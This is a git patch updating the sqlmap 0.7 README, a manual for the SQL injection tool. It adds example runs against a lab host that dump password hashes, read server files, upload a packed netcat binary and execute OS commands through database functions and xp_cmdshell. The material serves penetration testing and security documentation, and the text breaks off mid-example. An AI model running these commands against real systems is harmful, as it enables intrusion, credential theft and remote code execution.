From 45e3ce798f72039976470e6514ec297133293845 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 25 Jul 2009 14:31:44 +0000 Subject: [PATCH] Updated documentation with all new features introduced since sqlmap 0.7-rc1 --- doc/README.html | 1099 ++++++- doc/README.pdf | 8210 +++++++++++++++++++++++++---------------------- doc/README.sgml | 1089 ++++++- 3 files changed, 6295 insertions(+), 4103 deletions(-) diff --git a/doc/README.html b/doc/README.html index 291224266..d43ba51c0 100644 --- a/doc/README.html +++ b/doc/README.html @@ -98,7 +98,9 @@ for x86, AMD64 and Itanium too.

Metasploit Framework for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the download -page. The required version is 3.2 or above.

+page. The required version is 3.2 or above, recommended is the +latest 3.3 development version from Metasploit's subversion +repository.

Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and @@ -403,42 +405,34 @@ stand-alone executable.

3. Download and update

-

sqlmap 0.7 release candidate 1 version can be downloaded as a -source gzip compressed file or as a -source zip compressed file.

-

sqlmap can be downloaded from its -SourceForge File List page. +SourceForge File List page. It is available in various formats:

-

Whatever way you downloaded sqlmap, run it with --update -option to update it to the latest stable version available on its -SourceForge File List page.

-

You can also checkout the source code from the sqlmap Subversion repository to give a try to the development release:

@@ -457,8 +451,9 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev General Public License v2. sqlmap is copyrighted by Bernardo Damele A. G. -and -Daniele Bellucci.

+(2007-2009) and +Daniele Bellucci +(2006).

5. Usage

@@ -468,7 +463,7 @@ and
 $ python sqlmap.py -h
 
-    sqlmap/0.7rc1
+    sqlmap/0.7
     by Bernardo Damele A. G. <bernardo.damele@gmail.com>
     
 Usage: sqlmap.py [options]
@@ -551,16 +546,15 @@ Options:
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt -D)
     --columns           Enumerate DBMS database table columns (req -T opt -D)
-    --dump              Dump DBMS database table entries (req -T, opt -D, -C,
-                        --start, --stop)
+    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
     -U USER             DBMS user to enumerate
     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
-    --start=LIMITSTART  First table entry to dump
-    --stop=LIMITSTOP    Last table entry to dump
+    --start=LIMITSTART  First query output entry to retrieve
+    --stop=LIMITSTOP    Last query output entry to retrieve
     --sql-query=QUERY   SQL statement to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
@@ -693,7 +687,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:55] [INFO] testing MySQL
@@ -706,7 +700,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 
@@ -728,7 +722,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200): @@ -749,7 +743,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -771,7 +765,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200): @@ -799,7 +793,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200): @@ -1110,7 +1104,7 @@ Host: 192.168.1.125:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ Connection: close @@ -1126,7 +1120,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Cookie: ASPSESSIONIDSABTRCAS=469 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic @@ -1178,7 +1172,7 @@ Accept-language: en-us,en;q=0.5 Referer: http://www.google.com Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1195,7 +1189,7 @@ Connection: close

-sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+sqlmap/0.7 (http://sqlmap.sourceforge.net)
 

@@ -1317,7 +1311,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M= -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1338,7 +1332,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication" nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a" -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1519,7 +1513,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
+  -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)"
 
 [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
 [hh:mm:40] [INFO] testing connection to the target url
@@ -1659,7 +1653,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
@@ -1736,7 +1730,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=
 [hh:mm:50] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1758,7 +1752,7 @@ Content-Type: text/html
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1780,7 +1774,7 @@ Content-Type: text/html
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2211,7 +2205,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2393,7 +2387,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1
 [hh:mm:38] [INFO] testing Oracle
 [hh:mm:38] [INFO] confirming Oracle
 [hh:mm:38] [INFO] the back-end DBMS is Oracle
-[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
+[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION 
+WHERE ROWNUM=1
 [hh:mm:38] [INFO] retrieved: 10
 [hh:mm:38] [INFO] performed 20 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
@@ -2786,11 +2781,11 @@ management system user.

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0 [*] debian-sys-maint [1]: - password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892 + password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892 [*] root [1]: - password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B + password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B [*] testuser [1]: - password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 + password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29

@@ -2807,12 +2802,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --pas database management system users password hashes: [*] sa [1]: - password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f + password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f ba9930b62ee5d506955 header: 0x0100 - salt: 0e16d704 - mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955 + salt: 0a16d704 + mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 + uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955

@@ -2852,7 +2847,7 @@ CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1 [hh:mm:51] [INFO] performed 251 queries in 2 seconds database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96044b72d0bba108ace96d1e4 + password hash: md5d7d880f96034b72d0bba108afe96c1e7

@@ -3322,7 +3317,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3376,7 +3371,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3389,7 +3384,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "1","luther","blissett" "2","fluffy","bunny" "3","wu","ming" -"4","sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)","user agent header" +"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header" "5","","nameisnull" @@ -3419,7 +3414,7 @@ Table: users +----+----------------------------------------------+-------------------+ | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | +----+----------------------------------------------+-------------------+ @@ -3450,7 +3445,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3540,7 +3535,7 @@ Table: users +----+----------------------------------------------+-------------------+ | id | name | surname | +----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 2 | fluffy | bunny | | 1 | luther | blisset | | 3 | wu | ming | @@ -3766,7 +3761,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql sql> [TAB TAB] LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y' +(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) +LIMIT 0, 1)='Y' AND ORD(MID((%s), %d, 1)) > %d CAST(%s AS CHAR(10000)) COUNT(%s) @@ -3779,7 +3775,8 @@ MID((%s), %d, %d) ORDER BY %s ASC SELECT %s FROM %s.%s SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' +SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND +table_schema='%s' SELECT grantee FROM information_schema.USER_PRIVILEGES SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES SELECT schema_name FROM information_schema.SCHEMATA @@ -3835,10 +3832,12 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1 [hh:mm:48] [INFO] performed 55 queries in 0 seconds [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users +[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM +test.users [hh:mm:04] [INFO] retrieved: 5 [hh:mm:04] [INFO] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries +[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many +entries do you want to retrieve? [a] All (default) [#] Specific number @@ -3853,8 +3852,8 @@ ORDER BY id ASC LIMIT 0, 1 ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: luther [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: blissett [hh:mm:09] [INFO] performed 62 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3865,8 +3864,8 @@ ORDER BY id ASC LIMIT 1, 1 ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: fluffy [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: bunny [hh:mm:09] [INFO] performed 41 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3877,8 +3876,8 @@ ORDER BY id ASC LIMIT 2, 1 ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: wu [hh:mm:09] [INFO] performed 20 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: ming [hh:mm:10] [INFO] performed 34 queries in 0 seconds SELECT * FROM test.users [3]: @@ -3904,7 +3903,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql [...] back-end DBMS: PostgreSQL -[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER +[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER sql> SELECT COUNT(name) FROM users [10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' [10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n @@ -3917,8 +3916,8 @@ SELECT COUNT(name) FROM users: '4' sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); [10:12:35] [INFO] testing stacked queries support on parameter 'id' [10:12:40] [INFO] the web application supports stacked queries on parameter 'id' -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) -VALUES (5, 'from', 'sql shell');' +[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users +(id, name, surname) VALUES (5, 'from', 'sql shell');' [10:12:40] [INFO] done sql> SELECT COUNT(name) FROM users [10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' @@ -3951,20 +3950,22 @@ support when the back-end DBMS is PostgreSQL.

Option: --read-file

It is possible to retrieve the content of files from the underlying file -system when the back-end database management is system is either MySQL, -PostgreSQL or Microsoft SQL Server. +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-

The techniques implemented are detailed on the white paper +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

-

Example on a PostgreSQL 8.3.5 target:

+

Example on a PostgreSQL 8.3.5 target to retrieve a text file:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
-  "C:\example.txt" -v2
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+  --read-file "C:\example.txt" -v 2
 
 [...]
 [hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
@@ -4022,45 +4023,98 @@ This is a text file
 

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target to +retrieve a binary file:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --read-file "C:\example.exe" --union-use -v 1
+
+[...]
+[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
+technique
+[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name'
+[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter 
+'name' by appending a false condition after the parameter value
+[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
+inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
+
+[hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:54] [INFO] fetching file: 'C:/example.exe'
+[hh:mm:54] [INFO] the SQL query provided returns 3 entries
+C:/example.exe file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/
+C__example.exe'
+
+[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
+192.168.1.121'
+
+$ ls -l output/192.168.1.121/files/C__example.exe 
+-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe
+
+$ file output/192.168.1.121/files/C__example.exe 
+output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+
+
+

+

Write a local file on the back-end DBMS file system

Options: --write-file and --dest-file

It is possible to upload a local file to the underlying file system when -the back-end database management is system is either MySQL, PostgreSQL or -Microsoft SQL Server. +the back-end database management system is either MySQL, PostgreSQL or +Microsoft SQL Server and the session user has the needed privileges to +abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-

The techniques implemented are detailed on the white paper +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

-

Example on a MySQL 5.0.67 target:

+

Example on a MySQL 5.0.67 target to upload a binary UPX-compressed +file:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
-  "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
+$ file /tmp/nc.exe.packed 
+/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
+
+$ ls -l /tmp/nc.exe.packed
+-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \
+  "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
 
 [...]
-[01:12:29] [INFO] the back-end DBMS is MySQL
+[hh:mm:29] [INFO] the back-end DBMS is MySQL
 web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[01:12:29] [INFO] testing stacked queries support on parameter 'id'
-[01:12:29] [INFO] detecting back-end DBMS version from its banner
-[01:12:29] [INFO] retrieved: 5.0.67
-[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
-[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
-[01:12:36] [INFO] retrieved: C
-[01:12:36] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:29] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:29] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:29] [INFO] retrieved: 5.0.67
+[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:36] [INFO] retrieved: C
+[hh:mm:36] [INFO] the back-end DBMS operating system is Windows
 do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
 written on the back-end DBMS file system? [Y/n] y
-[01:12:52] [INFO] retrieved: 31744
-[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same 
-size as the local file '/home/inquis/software/netcat/nc.exe.packed'
+[hh:mm:52] [INFO] retrieved: 31744
+[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, 
+same size as the local file '/tmp/nc.exe.packed'
 

@@ -4069,55 +4123,850 @@ size as the local file '/home/inquis/software/netcat/nc.exe.packed'

5.9 Operating system access

-

Execute an operating system command

+

Execute arbitrary operating system command

-

Option: --os-cmd

+

Options: --os-cmd and --os-shell

-

TODO

+

It is possible to execute arbitrary commands on the underlying operating +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses.

-

The techniques implemented are detailed on the white paper +

On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality +demonstrated above) a shared library (binary file) containing two +user-defined functions, sys_exec() and sys_eval(), then +it creates these two functions on the database and call one of them to +execute the specified command, depending on the user's choice to display +the standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored +procedure: if it's disable sqlmap re-enables it, if it does not exist, +sqlmap creates it from scratch.

+ +

If the user wants to retrieve the command standard output, sqlmap will use +one of the enumeration SQL injection techniques (blind or inband) to +retrieve it, viceversa sqlmap will use the stacked query SQL injection +technique to execute the command without returning anything to the user.

+ +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

+

It is possible to specify a single command to be executed with the +--os-cmd option.

-

Prompt for an interactive operating system shell

+

Example on a PostgreSQL 8.3.5 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+  --os-cmd "whoami" -v 1
 
-

Option: --os-shell

+[...] +[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: PostgreSQL -

TODO

+[hh:mm:05] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:05] [INFO] detecting back-end DBMS version from its banner +[hh:mm:05] [INFO] retrieved: 8.3.5, +[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:16] [INFO] the back-end DBMS operating system is Windows +[hh:mm:16] [INFO] testing if current user is DBA +[hh:mm:16] [INFO] retrieved: 1 +[hh:mm:16] [INFO] checking if sys_exec UDF already exist +[hh:mm:16] [INFO] retrieved: 0 +[hh:mm:18] [INFO] checking if sys_eval UDF already exist +[hh:mm:18] [INFO] retrieved: 0 +[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file +do you want to retrieve the command standard output? [Y/n] +[hh:mm:35] [INFO] retrieved: w2k3dev\postgres +command standard output: 'w2k3dev\postgres' +
+
+

-

The techniques implemented are detailed on the white paper -Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-cmd "whoami" --union-use -v 1
+
+[...]
+[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
+technique
+[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name'
+[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' 
+by appending a false condition after the parameter value
+[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
+sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
+
+[hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:03] [INFO] testing if current user is DBA
